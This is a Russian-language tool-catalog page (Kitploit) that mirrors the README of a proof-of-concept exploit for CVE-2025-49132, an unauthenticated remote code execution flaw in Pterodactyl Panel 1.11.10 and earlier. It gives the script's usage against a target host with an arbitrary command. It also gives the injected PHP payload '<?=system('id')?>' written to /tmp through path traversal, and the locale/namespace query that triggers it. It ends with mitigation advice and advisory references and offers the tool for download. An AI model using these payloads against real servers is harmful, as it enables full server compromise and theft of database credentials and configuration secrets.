Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — Эксплойт PoC для CVE-2025-49132 (GHSA-24wv-6c99-f843) – Неавторизованное удалённое выполнение кода в Pterodactyl Panel ≤ 1.11.10 | Kitploit
Инструменты/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

Эксплойт PoC для CVE-2025-49132 (GHSA-24wv-6c99-f843) – Неавторизованное удалённое выполнение кода в Pterodactyl Panel ≤ 1.11.10

РепозиторийСайт
317 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132

Pterodactyl Panel - Неаутентифицированное удаленное выполнение кода (RCE)


🔎 Краткое описание

CVE‑2025‑49132 — это критическая уязвимость удаленного выполнения кода, затрагивающая Pterodactyl Panel <= 1.11.10.

Неаутентифицированный злоумышленник может использовать неправильную проверку входных данных в конечной точке /locales/locale.json для выполнения произвольных системных команд.

Исправлено в версии: 1.11.11


📌 Воздействие

Успешная эксплуатация позволяет:

  • Неаутентифицированное удаленное выполнение кода
  • Чтение конфиденциальных файлов (например, .env)
  • Извлечение учетных данных базы данных
  • Полную компрометацию сервера

Серьезность: Критическая


🧠 Коренная причина

Уязвимость существует из-за неправильной проверки:

  • параметра locale
  • параметра namespace
  • Злоумышленник может:

    1. Использовать обход каталога (../../../../../)
    2. Воспользоваться config-create
    3. Записать произвольные PHP-полезные нагрузки в /tmp
    4. Запустить выполнение через специально созданную загрузку пространства имен

    Классификация слабости: CWE-94 — Неправильный контроль генерации кода


    🚀 Доказательство концепции (PoC)

    Использование

    root@kitploit:~
    python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
    

    Примеры

    root@kitploit:~
    python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
    python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
    

    Путь по умолчанию:

    root@kitploit:~
    /usr/share/php/PEAR
    

    Получить правильный путь со страницы /phpinfo.php альтернативный текст


    🛠 Процесс эксплуатации

    Шаг 1 - Запись полезной нагрузки

    Злоумышленник внедряет вредоносную PHP-полезную нагрузку в /tmp/payload.php с помощью:

    root@kitploit:~
    /<?=system('id')?>+/tmp/payload.php
    

    Шаг 2 --- Запуск выполнения

    Вызовом:

    root@kitploit:~
    ?locale=../../../../../tmp&namespace=payload
    

    Сервер выполняет внедренный PHP.

    альтернативный текст

    🛡 Смягчение

    • Обновление до Pterodactyl Panel >= 1.11.11
    • Очистка входных данных locale и namespace
    • Отключение опасных PHP-функций
    • Ограничение ненужного доступа к конечным точкам

    📚 Ссылки

    • Консультация GitHub: GHSA-24wv-6c99-f843
    • CVE-2025-49132
    • Коммит исправления Pterodactyl Panel v1.11.11

    Скачать инструмент